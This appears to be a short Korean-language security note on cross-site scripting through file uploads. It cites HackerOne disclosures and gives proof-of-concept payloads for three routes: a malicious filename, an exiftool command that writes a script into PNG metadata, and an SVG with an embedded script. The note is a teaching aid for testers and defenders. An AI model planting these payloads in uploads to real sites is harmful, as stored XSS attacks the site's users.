[XSS] File upload XSS

XSS via filename

---

Node.js third-party modules disclosed on HackerOne: [tianma-static]...

1. create filename <img src=x onerror=alert(1)>
2. start tianma-static
3. xss fired

 

 

XSS via Metadata

---

Shopify disclosed on HackerOne: XSS Stored via Upload avatar PNG...

Exiftool를 사용하여 메타데이터에 xss 페이로드 쓰기

파일에서 exif 메타데이터가 제거되지 않은 경우에 발생할 수 있다.

 

exiftool command

exiftool -Comment="\"><script>alert(prompt('XSS'))</script>" xss_comment_exif_metadata_double_quote.png

Payload 

�PNG
�
IHDRdp�TtEXtSoftwareAdobe ImageReadyq�e<9tEXtComment"><script>alert(prompt('XSS BY ZEROX4'))</script>
                                                                                                    /-{IDATx���E��K��s�9xd$#���J� %IR$�(���s�9Ñ������evnv���>����q�;;;S�U������\.����=��=�ܿ��BCb����QHyԑEYՑ�s$s�T�:�x���8���إ�}2`���0P����@�(��j�(����D�J�d�%[�

 

 

XSS via SVG

---

Paragon Initiative Enterprises disclosed on HackerOne: Stored XSS...

Stored XSS using SVG file

웹 애플리케이션이 이미지 유형이기도 한 SVG(Scalable Vector Graphics) 파일 확장자 업로드를 허용하는 경우. xss 취약점이 발생할 수도 있다.

 

Payload

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS via SVG");
  </script>
</svg>